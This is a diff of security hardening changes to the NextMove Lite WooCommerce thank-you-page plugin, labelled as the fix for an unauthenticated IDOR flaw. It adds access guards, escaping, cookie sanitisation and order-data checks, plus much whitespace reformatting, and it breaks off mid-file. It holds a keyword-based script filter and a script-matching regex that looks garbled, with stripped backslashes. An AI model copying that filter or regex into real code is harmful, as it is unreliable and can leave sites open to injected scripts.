CVE-2026-24599: NextMove Lite <= 2.23.0 – Unauthenticated Insecure Direct Object Reference (woo-thank-you-page-nextmove-lite)

--- a/woo-thank-you-page-nextmove-lite/admin/includes/index.php
+++ b/woo-thank-you-page-nextmove-lite/admin/includes/index.php
@@ -1,2 +1,3 @@
 <?php
+defined( 'ABSPATH' ) || exit;
 // Silence is golden.
--- a/woo-thank-you-page-nextmove-lite/admin/index.php
+++ b/woo-thank-you-page-nextmove-lite/admin/index.php
@@ -1,2 +1,3 @@
 <?php
+defined( 'ABSPATH' ) || exit;
 // Silence is golden.
--- a/woo-thank-you-page-nextmove-lite/admin/xlwcty-admin.php
+++ b/woo-thank-you-page-nextmove-lite/admin/xlwcty-admin.php
@@ -1,5 +1,6 @@
 <?php
 defined( 'ABSPATH' ) || exit;
+
 #[AllowDynamicProperties]
 class xlwcty_Admin {

@@ -501,7 +502,7 @@
 				$option   .= $page->post_title;
 				$option   .= '</option>';

-				echo ( $option );
+				echo( $option );
 			}
 			?>
         </select>
@@ -663,7 +664,7 @@
                                                     </li>
                                                 </ul>
                                                 <p>And the list goes on ...</p>
-                                                <center><a class="button-primary" href=<?php echo $unlock_pro_link; ?>>Unlock all the Awesome Features now</a></center>
+                                                <center><a class="button-primary" href="<?php echo esc_url( $unlock_pro_link ); ?>">Unlock all the Awesome Features now</a></center>
                                                 <p></p>
                                             </div>
                                         </div>
@@ -726,11 +727,11 @@
 									foreach ( $xlwcty_faq as $key => $val ) {
 										?>
                                         <li class="control-section accordion-section" id="">
-                                            <h4 class="accordion-section-title hndle" tabindex="<?php echo $index; ?>">
-												<?php echo $key; ?>
+                                            <h4 class="accordion-section-title hndle" tabindex="<?php echo esc_attr( $index ); ?>">
+												<?php echo esc_html( $key ); ?>
                                             </h4>
                                             <div class="accordion-section-content ">
-												<?php echo $val; ?>
+												<?php echo wp_kses_post( $val ); ?>
                                             </div><!-- .accordion-section-content -->
                                         </li><!-- .accordion-section -->
 										<?php
@@ -847,7 +848,9 @@
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_site_url', array( site_url() ) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_admin_permalink', array( admin_url( 'options-permalink.php' ) ) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwctyParams', array(
-				'ajax_nonce' => wp_create_nonce( 'xlwctyaction-admin' ),
+				'ajax_nonce'            => wp_create_nonce( 'xlwctyaction-admin' ),
+				'ajax_url'              => admin_url( 'admin-ajax.php' ),
+				'search_products_nonce' => wp_create_nonce( 'search-products' ),
 			) );
 			wp_localize_script( 'xlwcty_admin-js', 'xlwcty_nonces', array(
 				'xlwcty_get_pages_for_order' => wp_create_nonce( 'xlwcty_get_pages_for_order' ),
@@ -1183,6 +1186,7 @@
 			wp_localize_script( 'xlwcty-admin-app', 'xlwctyParams', $data );
 		}

+
 		if ( $this->is_builder_page ) {
 			add_filter( 'wp_default_editor', function ( $editor ) {
 				return 'html';
@@ -1743,9 +1747,12 @@
                 <div class="xlwcty_screen_wrap">
                     <div class="xlwcty_load_pattern"></div>
                     <div class="xlicon"></div>
-					<?php if ( isset( $_COOKIE['xlwcty_preview_data'] ) && $_COOKIE['xlwcty_preview_data'] !== '' ) { ?>
+					<?php
+					// Security fix: Sanitize and validate cookie value before use
+					$preview_url = isset( $_COOKIE['xlwcty_preview_data'] ) && $_COOKIE['xlwcty_preview_data'] !== '' ? esc_url( sanitize_text_field( wp_unslash( $_COOKIE['xlwcty_preview_data'] ) ) ) : '';
+					if ( ! empty( $preview_url ) ) { ?>
                         <div class="xlwcty_load_info"><?php _e( "Your preview will open in new window automatically.<br/>If it doesn't click on Preview button again or allow Pop-ups for your domain.", 'woo-thank-you-page-nextmove-lite' ); ?></div>
-                        <a style="visibility:hidden;" target="_blank" href="<?php echo $_COOKIE['xlwcty_preview_data']; ?>"></a>
+                        <a style="visibility:hidden;" target="_blank" href="<?php echo $preview_url; ?>"></a>
 					<?php } ?>
                 </div>
             </div>
--- a/woo-thank-you-page-nextmove-lite/compatibilities/class-xlwcty-wpml.php
+++ b/woo-thank-you-page-nextmove-lite/compatibilities/class-xlwcty-wpml.php
@@ -94,6 +94,7 @@
 			if ( $url_lang ) {
 				return $url_lang;
 			}
+
 			return $this->get_current_language();
 		}

@@ -131,6 +132,7 @@
 		}

 		$current_lang = $this->get_current_language();
+
 		return $current_lang;
 	}

@@ -189,6 +191,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -202,6 +205,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -329,6 +333,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -342,6 +347,7 @@
 					$sitepress->switch_lang( $url_lang, true );
 				}
 			}
+
 			return;
 		}

@@ -380,8 +386,9 @@
 	 * Get translated page ID
 	 * Falls back to default language if translation doesn't exist
 	 *
-	 * @param int         $page_id         The page ID to translate.
+	 * @param int $page_id The page ID to translate.
 	 * @param string|null $target_language Target language code.
+	 *
 	 * @return int Translated page ID or original page ID.
 	 */
 	public function get_translated_page_id( $page_id, $target_language = null ) {
@@ -456,6 +463,7 @@
 			$translated_post = get_post( $translated_id );
 			if ( $translated_post && $translated_post->post_status === 'publish' ) {
 				self::$translation_cache[ $cache_key ] = $translated_id;
+
 				return $translated_id;
 			}
 		}
@@ -467,6 +475,7 @@
 			$original_post = get_post( $page_id );
 			if ( $original_post && $original_post->post_status === 'publish' ) {
 				self::$translation_cache[ $cache_key ] = $page_id;
+
 				return $page_id;
 			}
 		}
@@ -487,6 +496,7 @@
 				$default_post = get_post( $default_translated_id );
 				if ( $default_post && $default_post->post_status === 'publish' ) {
 					self::$translation_cache[ $cache_key ] = $default_translated_id;
+
 					return $default_translated_id;
 				}
 			}
@@ -494,6 +504,7 @@

 		// Final fallback: return original page ID
 		self::$translation_cache[ $cache_key ] = $page_id;
+
 		return $page_id;
 	}

@@ -506,18 +517,18 @@
 		if ( ! $sitepress ) {
 			return null;
 		}
-
+
 		// Use WPML filter to get post language
 		$post_language = apply_filters( 'wpml_element_language_code', null, array(
-			'element_id' => $post_id,
+			'element_id'   => $post_id,
 			'element_type' => XLWCTY_Common::get_thank_you_page_post_type_slug(),
 		) );
-
+
 		// Fallback to SitePress API if filter doesn't work
 		if ( ! $post_language && method_exists( $sitepress, 'get_language_for_element' ) ) {
 			$post_language = $sitepress->get_language_for_element( $post_id, 'post_' . XLWCTY_Common::get_thank_you_page_post_type_slug() );
 		}
-
+
 		return $post_language ? $post_language : $this->get_default_language();
 	}

--- a/woo-thank-you-page-nextmove-lite/components/additional-information/data.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/data.php
@@ -89,7 +89,7 @@

 	),
 );
-$config['default'] = array(
+$config['default']  = array(
 	'border_style'       => 'solid',
 	'border_width'       => '1',
 	'border_color'       => '#d9d9d9',
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/help.php
@@ -3,23 +3,23 @@

 ob_start();
 ?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/additional-info.jpg"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td>1.</td>
-				<td><strong>Content:</strong> WooCommerce or other plugins sometimes add additional information to native Thank You pages. This component will show those additional information blocks.
-					For example WooCommerce displays additional information for payment gateways such as BACS, Cheque or Cash On Delivery.
-				</td>
-			</tr>
-			<tr>
-				<td width="50">2.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/additional-info.jpg"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td>1.</td>
+                <td><strong>Content:</strong> WooCommerce or other plugins sometimes add additional information to native Thank You pages. This component will show those additional information blocks.
+                    For example WooCommerce displays additional information for payment gateways such as BACS, Cheque or Cash On Delivery.
+                </td>
+            </tr>
+            <tr>
+                <td width="50">2.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>


-		</table>
-	</div>
+        </table>
+    </div>
 <?php
 return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Additional_Information extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $is_disable       = true;
+	public $viewpath = '';
+	public $is_disable = true;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/additional-information/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/additional-information/views/view.php
@@ -1,6 +1,13 @@
 <?php
 defined( 'ABSPATH' ) || exit;

+// Security: Check if order_data exists before proceeding
+if ( empty( $order_data ) || ! is_object( $order_data ) || ! method_exists( $order_data, 'get_id' ) ) {
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Order data not available', 'woo-thank-you-page-nextmove-lite' ) ) );
+
+	return false;
+}
+
 remove_action( 'woocommerce_thankyou', 'woocommerce_order_details_table', 10 );
 $payment_method = XLWCTY_Compatibility::get_order_data( $order_data, 'payment_method' );
 remove_action( 'wp_footer', array( XLWCTY_Core()->public, 'execute_wc_thankyou_hooks' ), 1 );
@@ -13,7 +20,7 @@
  * SECURITY: Extract and validate scripts before escaping HTML content
  * This prevents XSS while allowing legitimate tracking scripts to execute
  */
-$scripts = array();
+$scripts        = array();
 $script_pattern = '/(<scriptb[^>]*>.*?</script>)/is';

 if ( preg_match_all( $script_pattern, $get_content, $script_matches ) ) {
@@ -28,7 +35,7 @@
 			'XMLHttpRequest',
 			'DOMContentLoaded',
 		);
-
+
 		$is_safe = false;
 		foreach ( $safe_script_keywords as $keyword ) {
 			if ( strpos( $script, $keyword ) !== false ) {
@@ -46,7 +53,7 @@
 			'innerHTML',
 			'outerHTML',
 		);
-
+
 		$is_dangerous = false;
 		foreach ( $dangerous_patterns as $pattern ) {
 			if ( strpos( $script, $pattern ) !== false ) {
@@ -54,13 +61,13 @@
 				break;
 			}
 		}
-
+
 		// Only allow safe scripts without dangerous patterns
 		if ( $is_safe && ! $is_dangerous ) {
 			$scripts[] = $script;
 		}
 	}
-
+
 	// Remove scripts from content before escaping
 	$get_content = preg_replace( $script_pattern, '', $get_content );
 }
@@ -76,13 +83,13 @@

 if ( '' !== $parsed_content ) {
 	?>
-	<div class="xlwcty_Box xlwcty_textBox xlwcty-wc-thankyou"><?php echo $filtered_content; ?>
-	</div>
+    <div class="xlwcty_Box xlwcty_textBox xlwcty-wc-thankyou"><?php echo $filtered_content; ?>
+    </div>
 	<?php
 } else {
 	?>
-	<div style="display: none;"><?php echo $filtered_content; ?>
-	</div>
+    <div style="display: none;"><?php echo $filtered_content; ?>
+    </div>
 	<?php
 }

@@ -91,7 +98,7 @@
  * This maintains security while allowing legitimate tracking scripts
  */
 if ( ! empty( $scripts ) ) {
-	add_action( 'wp_footer', function() use ( $scripts ) {
+	add_action( 'wp_footer', function () use ( $scripts ) {
 		foreach ( $scripts as $script ) {
 			// Scripts have been validated - output directly
 			echo $script; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
--- a/woo-thank-you-page-nextmove-lite/components/coupon-code/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/coupon-code/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Coupon_Code extends xlwcty_component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
+	public $is_disable = true;
+	public $viewpath = '';


 	public function __construct( $order = false ) {
--- a/woo-thank-you-page-nextmove-lite/components/crosssell-product/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/crosssell-product/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Cross_Sell_Product extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
+	public $is_disable = true;
+	public $viewpath = '';


 	public function __construct( $order = false ) {
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/data.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/data.php
@@ -246,7 +246,7 @@
 		),
 	),
 );
-$config['default'] = array(
+$config['default']  = array(
 	'heading'              => __( 'Customer Information', 'woo-thank-you-page-nextmove-lite' ),
 	'heading_font_size'    => '20',
 	'heading_alignment'    => 'left',
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/help.php
@@ -3,33 +3,33 @@

 ob_start();
 ?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/customer-information.jpg"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Billing Address:</strong> You can manage the display of it.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Shipping Address:</strong> You can manage the display of it.</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Layout:</strong> Plugin has 2 layouts `Two Column` or `Full Width`.<br/>Two Column - Split both the address into 2 columns and display available ones accordingly.<br/>Full
-					Width - Display each available address in full width.
-				</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="//storage.googleapis.com/xl-nextmove/customer-information.jpg"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Billing Address:</strong> You can manage the display of it.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Shipping Address:</strong> You can manage the display of it.</td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Layout:</strong> Plugin has 2 layouts `Two Column` or `Full Width`.<br/>Two Column - Split both the address into 2 columns and display available ones accordingly.<br/>Full
+                    Width - Display each available address in full width.
+                </td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
 <?php
 return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/instance.php
@@ -5,7 +5,7 @@
 class XLWCTY_Customer_Information extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
+	public $viewpath = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/customer-info/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/customer-info/views/view.php
@@ -1,6 +1,13 @@
 <?php
 defined( 'ABSPATH' ) || exit;

+// Security: Check if order_data exists before proceeding
+if ( empty( $order_data ) || ! is_object( $order_data ) || ! method_exists( $order_data, 'get_formatted_billing_address' ) ) {
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Order data not available', 'woo-thank-you-page-nextmove-lite' ) ) );
+
+	return false;
+}
+
 add_filter( 'woocommerce_order_formatted_billing_address', array( $this, 'xlwcty_format_billing_address' ), 11, 2 );
 add_filter( 'woocommerce_order_formatted_shipping_address', array( $this, 'xlwcty_format_shipping_address' ), 11, 2 );
 if ( 'yes' !== $this->data->show_billing && 'yes' !== $this->data->show_shipping ) {
@@ -40,11 +47,11 @@
 	?>


-	<div class="xlwcty_Box xlwcty_customer_info">
+    <div class="xlwcty_Box xlwcty_customer_info">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        echo wp_kses_post( $heading_desc );
+		echo wp_kses_post( $heading_desc );
 		if ( ( 'yes' === $this->data->show_billing ) || ( 'yes' === $this->data->show_shipping ) ) {
 			echo '<div class="xlwcty_content xlwcty_clearfix">';

@@ -62,81 +69,89 @@
 			echo '</div>';
 			echo '<div class="xlwcty_clear_15"></div>';
 			if ( 'yes' === $this->data->show_billing ) {
+				// Security: Double-check order_data exists before calling methods
+				if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+					return false;
+				}
 				$billing_address     = $order_data->get_formatted_billing_address();
 				$billing_address_raw = $order_data->get_address();
 				$contact_name        = trim( $billing_address_raw['first_name'] . ' ' . $billing_address_raw['last_name'] );
-				$contact_name       .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
+				$contact_name        .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
 				if ( ! empty( $billing_address ) ) {
 					?>
-					<div class="xlwcty_2_colLeft">
-						<p class="xlwcty_BSpace"><strong><?php echo esc_html__( 'Billing address', 'woocommerce' ); ?></strong></p>
-						<div class="xlwcty_Dview">
-							<p>
+                    <div class="xlwcty_2_colLeft">
+                        <p class="xlwcty_BSpace"><strong><?php echo esc_html__( 'Billing address', 'woocommerce' ); ?></strong></p>
+                        <div class="xlwcty_Dview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $billing_address );
 								?>
-							</p>
-						</div>
-						<div class="xlwcty_Mview">
-							<p>
+                            </p>
+                        </div>
+                        <div class="xlwcty_Mview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $billing_address );
 								?>
-							</p>
-						</div>
-					</div>
+                            </p>
+                        </div>
+                    </div>
 					<?php
 				}
 			}
 			$billing_add_status = false;
 			if ( 'yes' === $this->data->show_shipping ) {
+				// Security: Double-check order_data exists before calling methods
+				if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+					return false;
+				}
 				$shipping_address     = $order_data->get_formatted_shipping_address();
 				$shipping_address_raw = $order_data->get_address( 'shipping' );
 				$contact_name         = trim( $shipping_address_raw['first_name'] . ' ' . $shipping_address_raw['last_name'] );
-				$contact_name        .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
+				$contact_name         .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
 				if ( ! empty( $shipping_address ) ) {
 					$billing_add_status = true;
 					$extra_class        = ( true === $billing_add_status ) ? 'xlwcty_2_colRight' : 'xlwcty_2_colLeft';
 					?>
-					<div class="<?php echo esc_attr( $extra_class ); ?>">
-						<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
-						<div class="xlwcty_Dview">
-							<p>
+                    <div class="<?php echo esc_attr( $extra_class ); ?>">
+                        <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
+                        <div class="xlwcty_Dview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $shipping_address );
 								?>
-							</p>
-						</div>
-						<div class="xlwcty_Mview">
-							<p>
+                            </p>
+                        </div>
+                        <div class="xlwcty_Mview">
+                            <p>
 								<?php
 								echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 								echo wp_kses_post( $shipping_address );
 								?>
-							</p>
-						</div>
-					</div>
+                            </p>
+                        </div>
+                    </div>
 					<?php
 				}
 			}

 			echo '</div>';
 		}
-        echo wp_kses_post( $after_desc );
+		echo wp_kses_post( $after_desc );
 		?>

-	</div>
+    </div>
 	<?php
 } else {
 	?>
-	<div class="xlwcty_Box xlwcty_customer_info xlwcty_info_full_width">
+    <div class="xlwcty_Box xlwcty_customer_info xlwcty_info_full_width">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        echo wp_kses_post( $heading_desc );
+		echo wp_kses_post( $heading_desc );
 		if ( '' !== $billing_email ) {
 			echo '<div class="xlwcty_content xlwcty_clearfix">';
 			echo '<p class="xlwcty_BSpace"><strong>' . esc_html( __( 'Email', 'woocommerce' ) ) . '</strong></p>';
@@ -150,51 +165,59 @@
 			echo '</div>';
 		}
 		if ( 'yes' === $this->data->show_billing ) {
+			// Security: Double-check order_data exists before calling methods
+			if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+				return false;
+			}
 			$billing_address     = $order_data->get_formatted_billing_address();
 			$billing_address_raw = $order_data->get_address();
 			$contact_name        = trim( $billing_address_raw['first_name'] . ' ' . $billing_address_raw['last_name'] );
-			$contact_name       .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
+			$contact_name        .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';

 			$contact_name = apply_filters( 'xlwcty_customer_info_contact_name', $contact_name, $billing_address_raw );

 			if ( ! empty( $billing_address ) ) {
 				?>
-				<div class="xlwcty_content xlwcty_clearfix">
-					<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Billing address', 'woocommerce' ) ); ?></strong></p>
-					<p>
+                <div class="xlwcty_content xlwcty_clearfix">
+                    <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Billing address', 'woocommerce' ) ); ?></strong></p>
+                    <p>
 						<?php
 						echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 						echo wp_kses_post( $billing_address );
 						?>
-					</p>
-				</div>
+                    </p>
+                </div>
 				<?php
 			}
 		}
 		if ( 'yes' === $this->data->show_shipping ) {
+			// Security: Double-check order_data exists before calling methods
+			if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+				return false;
+			}
 			$shipping_address     = $order_data->get_formatted_shipping_address();
 			$shipping_address_raw = $order_data->get_address( 'shipping' );
 			$contact_name         = trim( $shipping_address_raw['first_name'] . ' ' . $shipping_address_raw['last_name'] );
-			$contact_name        .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
+			$contact_name         .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
 			$contact_name         = apply_filters( 'xlwcty_customer_info_contact_name', $contact_name, $shipping_address_raw );

 			if ( ! empty( $shipping_address ) ) {
 				?>
-				<div class="xlwcty_content xlwcty_clearfix">
-					<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
-					<p>
+                <div class="xlwcty_content xlwcty_clearfix">
+                    <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
+                    <p>
 						<?php
 						echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 						echo wp_kses_post( $shipping_address );
 						?>
-					</p>
-				</div>
+                    </p>
+                </div>
 				<?php
 			}
 		}
-        echo wp_kses_post( $after_desc );
+		echo wp_kses_post( $after_desc );
 		?>
-	</div>
+    </div>
 	<?php
 }
 remove_filter( 'woocommerce_order_formatted_billing_address', array( $this, 'xlwcty_format_billing_address' ), 11 );
--- a/woo-thank-you-page-nextmove-lite/components/html/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/help.php
@@ -1,25 +1,25 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/html/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Description:</strong> Enter any text here. This is a WYSWYG editor, You can use any tinymce property or add shortcodes etc.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/html/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Description:</strong> Enter any text here. This is a WYSWYG editor, You can use any tinymce property or add shortcodes etc.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/html/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/instance.php
@@ -5,12 +5,12 @@
 class XLWCTY_Text extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
-	public $html_content     = '';
-	public $is_multiple      = true;
-	public $component_limit  = 1;
-	public $script           = '';
+	public $is_disable = true;
+	public $viewpath = '';
+	public $html_content = '';
+	public $is_multiple = true;
+	public $component_limit = 1;
+	public $script = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/html/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/views/view.php
@@ -2,21 +2,21 @@
 defined( 'ABSPATH' ) || exit;

 if ( '' !== $this->data->html_content || '' !== $this->data->heading ) {
-    XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
-    ?>
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
+	?>
     <div class="xlwcty_Box xlwcty_textBox <?php echo 'xlwcty_textBox_1'; ?>">
-        <?php
-        $heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
-        echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        $html_content_parsed = $this->data->html_content ? apply_filters( 'xlwcty_the_content', $this->data->html_content ) : '';
-        // Unfiltered HTML output is intentional for this component.
-        // This enables embedding third-party forms (Gravity Forms, WPForms), scripts, and iframes.
-        // Security: Content is only editable by users with manage_woocommerce capability via the admin page builder.
-        // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
-        echo $html_content_parsed ? '<div class="xlwcty_content">' . $html_content_parsed . '</div>' : '';
-        ?>
+		<?php
+		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
+		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
+		$html_content_parsed = $this->data->html_content ? apply_filters( 'xlwcty_the_content', $this->data->html_content ) : '';
+		// Unfiltered HTML output is intentional for this component.
+		// This enables embedding third-party forms (Gravity Forms, WPForms), scripts, and iframes.
+		// Security: Content is only editable by users with manage_woocommerce capability via the admin page builder.
+		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+		echo $html_content_parsed ? '<div class="xlwcty_content">' . $html_content_parsed . '</div>' : '';
+		?>
     </div>
-    <?php
+	<?php
 } else {
-    XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
